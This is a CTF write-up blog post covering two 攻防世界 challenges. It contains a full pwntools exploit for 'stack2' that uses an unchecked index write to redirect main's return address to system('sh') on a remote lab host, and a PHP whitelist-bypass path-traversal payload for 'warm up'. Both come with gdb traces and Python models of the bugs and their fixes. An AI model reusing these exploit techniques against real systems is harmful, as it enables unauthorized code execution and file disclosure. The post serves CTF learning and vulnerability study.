CTF Daily Challenge - Day 2


D2 T1 stack2

The challenge computes the average of a list of numbers and offers a function to edit them in place.

The bug lies in that edit function.

      puts("which number to change:");
      __isoc99_scanf("%d", &v5);
      puts("new number:");
      __isoc99_scanf("%d", &v7);
      v13[v5] = v7;                 // v5 is used as an index without any range check

The edit path does no bounds check on v5, so any byte on the stack can be overwritten.

From there it is a matter of hijacking EIP and jumping to the backdoor.

First pitfall

At first I read the stack layout straight from IDA and computed the offset from it,

but the program has stack canary protection enabled, so the offset has to be worked out with dynamic debugging.

gdb-peda$ b main
Breakpoint 1 at 0x80485de
gdb-peda$ b *0x080488F2 # address of the ret in main()
Breakpoint 2 at 0x80488f2
gdb-peda$ r
Starting program: /root/codes/adworld/stack2 
[----------------------------------registers-----------------------------------]
EAX: 0xf7fb7548 --> 0xffffd3fc --> 0xffffd590 ("SHELL=/bin/bash")
EBX: 0x0 
ECX: 0xffffd360 --> 0x1 
EDX: 0xffffd384 --> 0x0 
ESI: 0xf7fb5000 --> 0x1d6d6c 
EDI: 0xf7fb5000 --> 0x1d6d6c 
EBP: 0xffffd348 --> 0x0 
ESP: 0xffffd344 --> 0xffffd360 --> 0x1 
EIP: 0x80485de (<main+14>:      sub    esp,0xa4)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80485da <main+10>: push   ebp
   0x80485db <main+11>: mov    ebp,esp
   0x80485dd <main+13>: push   ecx
=> 0x80485de <main+14>: sub    esp,0xa4
   0x80485e4 <main+20>: mov    eax,gs:0x14
   0x80485ea <main+26>: mov    DWORD PTR [ebp-0xc],eax
   0x80485ed <main+29>: xor    eax,eax
   0x80485ef <main+31>: mov    eax,ds:0x804a040
[------------------------------------stack-------------------------------------]
0000| 0xffffd344 --> 0xffffd360 --> 0x1 
0004| 0xffffd348 --> 0x0 
0008| 0xffffd34c --> 0xf7dfc7e1 (<__libc_start_main+241>:       add    esp,0x10)
0012| 0xffffd350 --> 0xf7fb5000 --> 0x1d6d6c 
0016| 0xffffd354 --> 0xf7fb5000 --> 0x1d6d6c 
0020| 0xffffd358 --> 0x0 
0024| 0xffffd35c --> 0xf7dfc7e1 (<__libc_start_main+241>:       add    esp,0x10)
0028| 0xffffd360 --> 0x1 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x080485de in main ()
gdb-peda$ c
Continuing.
***********************************************************
*                      An easy calc                       *
*Give me your numbers and I will return to you an average *
*(0 <= x < 256)                                           *
***********************************************************
How many numbers you have:
4
Give me your numbers
1 2 3 4
1. show numbers
2. add number
3. change number
4. get average
5. exit
5
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xffffd360 --> 0x1 
EDX: 0xf7fb701c --> 0x0 
ESI: 0xf7fb5000 --> 0x1d6d6c 
EDI: 0xf7fb5000 --> 0x1d6d6c 
EBP: 0x0 
ESP: 0xffffd35c --> 0xf7dfc7e1 (<__libc_start_main+241>:        add    esp,0x10)
EIP: 0x80488f2 (<main+802>:     ret)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80488eb <main+795>:        mov    ecx,DWORD PTR [ebp-0x4]
   0x80488ee <main+798>:        leave  
   0x80488ef <main+799>:        lea    esp,[ecx-0x4]
=> 0x80488f2 <main+802>:        ret    
   0x80488f3:   xchg   ax,ax
   0x80488f5:   xchg   ax,ax
   0x80488f7:   xchg   ax,ax
   0x80488f9:   xchg   ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xffffd35c --> 0xf7dfc7e1 (<__libc_start_main+241>:       add    esp,0x10)
0004| 0xffffd360 --> 0x1 
0008| 0xffffd364 --> 0xffffd3f4 --> 0xffffd575 ("/root/codes/adworld/stack2")
0012| 0xffffd368 --> 0xffffd3fc --> 0xffffd590 ("SHELL=/bin/bash")
0016| 0xffffd36c --> 0xffffd384 --> 0x0 
0020| 0xffffd370 --> 0x1 
0024| 0xffffd374 --> 0x0 
0028| 0xffffd378 --> 0xf7fb5000 --> 0x1d6d6c 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x080488f2 in main ()

At the start, ebp = 0xffffd348.

According to IDA, v13 = ebp - 0x70 = 0xffffd2d8.

At the final breakpoint, esp = 0xffffd35c (i.e. the location of the return address).

offset = esp - v13 = 0xffffd35c - 0xffffd2d8 = 0x84
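The two observations above (an unchecked index in the "change number" handler, and a return address 0x84 bytes above v13 with the canary at ebp-0xc) explain why the canary does not catch this bug: the write is a single targeted byte, not a linear overflow that has to pass through the canary. The following model is an added illustration, not code from the challenge or from the write-up's exploit. It lays main()'s frame out as a byte array using the offsets derived above; the canary and return-address values are constructed sample values, and `change_number_fixed` is the check the binary is missing.

```python
# Added illustration (not the challenge binary): a byte-level model of
# main()'s frame in stack2, using the offsets derived above.
# All offsets are relative to the start of the v13 array (ebp-0x70).
ARRAY_OFF = 0x00              # v13 begins the modelled region (ebp-0x70)
CANARY_OFF = 0x70 - 0x0c      # canary at ebp-0xc  -> 0x64 bytes above v13
RET_OFF = 0x84                # saved return address (esp at the 'ret')
FRAME_SIZE = RET_OFF + 4


class Frame:
    """Toy frame: numbers, canary and return address laid out like stack2."""

    def __init__(self, numbers, canary=0x1234ABCD, ret=0x080488F2):
        # canary and ret are constructed sample values, not from the binary
        self.count = len(numbers)
        self.mem = bytearray(FRAME_SIZE)
        self.mem[ARRAY_OFF:ARRAY_OFF + self.count] = bytes(numbers)
        self.mem[CANARY_OFF:CANARY_OFF + 4] = canary.to_bytes(4, "little")
        self.mem[RET_OFF:RET_OFF + 4] = ret.to_bytes(4, "little")

    def canary(self):
        return int.from_bytes(self.mem[CANARY_OFF:CANARY_OFF + 4], "little")

    def ret(self):
        return int.from_bytes(self.mem[RET_OFF:RET_OFF + 4], "little")


def change_number_vulnerable(frame, idx, val):
    """Mirrors 'v13[v5] = v7;' from the decompilation: idx is never checked."""
    if not 0 <= idx < FRAME_SIZE:
        raise IndexError("outside the modelled frame")  # model limit only
    frame.mem[ARRAY_OFF + idx] = val & 0xFF


def change_number_fixed(frame, idx, val):
    """Hardened handler: the index must address a number actually stored."""
    if not 0 <= idx < frame.count:
        raise IndexError("index out of range")
    if not 0 <= val < 256:
        raise ValueError("value out of range")
    frame.mem[ARRAY_OFF + idx] = val


def write_dword(frame, handler, off, val):
    """Four single-byte writes assemble one little-endian dword."""
    for i in range(4):
        handler(frame, off + i, (val >> (8 * i)) & 0xFF)


def demo(target=0x08048450):
    """Returns (ret after unchecked writes, canary untouched?,
    fixed handler rejected?, ret under the fixed handler)."""
    f = Frame([1, 2, 3, 4])
    canary_before = f.canary()
    write_dword(f, change_number_vulnerable, RET_OFF, target)
    canary_unchanged = f.canary() == canary_before

    g = Frame([1, 2, 3, 4])
    try:
        write_dword(g, change_number_fixed, RET_OFF, target)
        rejected = False
    except IndexError:
        rejected = True
    return f.ret(), canary_unchanged, rejected, g.ret()


if __name__ == "__main__":
    print(demo())
```

The unchecked version lands the new return address while leaving the canary at 0x64 exactly as it was, which is why the protection reported by checksec makes no difference here; the fix is to bound the index by the number of values the user actually entered, not by the size of the buffer.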

The second pitfall is that the hackme function is of no use....

After reading a write-up I found that the target machine has no /bin/bash.

But system can be paired with "sh" (take the address of the "/bin/bash" string + 7).

Exp:

# coding: utf-8
from pwn import *
# stack2 is a 32-bit ELF, so the architecture is i386
context(arch="i386", os="linux", log_level="DEBUG")

io = remote("111.198.29.45", 46367)

def write_byte(off, val):
    # menu option 3 "change number": v13[off] = val, with no bounds check on off
    io.sendline(b"3")
    io.sendlineafter(b"which number to change:\n", str(off).encode())
    io.sendlineafter(b"new number:\n", str(val).encode())

def write_dword(off, val):
    # four single-byte writes assemble one little-endian dword
    for i in range(4):
        write_byte(off + i, (val >> (8 * i)) & 0xff)

system_addr = 0x08048450      # address of system used by this exploit
sh_addr = 0x08048980 + 7      # "sh" inside the "/bin/bash" string
offset = 0x84                 # distance from v13 to the saved return address

io.sendlineafter(b"How many numbers you have:\n", b"1")
io.sendlineafter(b"Give me your numbers\n", b"1")
io.recvuntil(b"5. exit\n")

write_dword(offset, system_addr)            # return address -> system
write_dword(offset + 0x4 + 0x4, sh_addr)    # first argument of system -> "sh"

io.sendline(b"5")   # exit: main() returns into system("sh")
io.interactive()

D2 T2 warm up

A genuine warm-up.

$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
$_page = mb_substr(
    $page,
    0,
    mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
    return true;
}

Adding a ? makes mb_substr cut the value off before it, so the whitelist check only ever sees the part in front of the ? and the rest of the path is never inspected.

payload=?file=hint.php?/../../../../ffffllllaaaagggg

Then just read the flag.
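To make the check above concrete, here is an added Python model of it (not the challenge's PHP): `php_style_check` reproduces the mb_substr/mb_strpos/in_array logic, `resolved` shows what path the remaining string actually points at once the part before the ? is treated as a directory, and `strict_check` is the obvious hardening, comparing the whole parameter against the whitelist. The sample inputs are constructed; the payload string is the one from the write-up.

```python
# Added illustration (not the challenge's PHP): a model of the whitelist
# check and of a stricter replacement.
import posixpath

WHITELIST = {"source": "source.php", "hint": "hint.php"}


def php_style_check(page):
    """Mirrors mb_substr($page, 0, mb_strpos($page . '?', '?')) + in_array.

    mb_strpos on $page . '?' always finds a '?', so the prefix is everything
    before the first '?' (or the whole string when there is none)."""
    prefix = page[:(page + "?").index("?")]
    return prefix in WHITELIST.values()


def strict_check(page):
    """Hardened: the entire value must equal a whitelisted file name."""
    return page in WHITELIST.values()


def resolved(page):
    """Where the value ends up pointing once used as a path component chain."""
    return posixpath.normpath(page)


# constructed samples; the second one is the payload from the write-up
SAMPLES = [
    "hint.php",
    "hint.php?/../../../../ffffllllaaaagggg",
    "hint.php?x=1",
    "../hint.php",
]


def evaluate_all():
    """Returns (value, passes original check, passes strict check) per sample."""
    return [(p, php_style_check(p), strict_check(p)) for p in SAMPLES]


if __name__ == "__main__":
    for value, loose, strict in evaluate_all():
        print(f"{value!r:45} original={loose!s:5} strict={strict!s:5} -> {resolved(value)}")
```

The payload passes the original check because only `hint.php` is compared against the whitelist, while the value as a whole normalises to `../../../ffffllllaaaagggg`, four levels above the include directory; the strict comparison rejects anything that is not exactly a whitelisted name.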

Challenge source: 攻防世界

Notice: Eki's Blog | All rights reserved | Original content unless otherwise stated | This site is licensed under BY-NC-SA
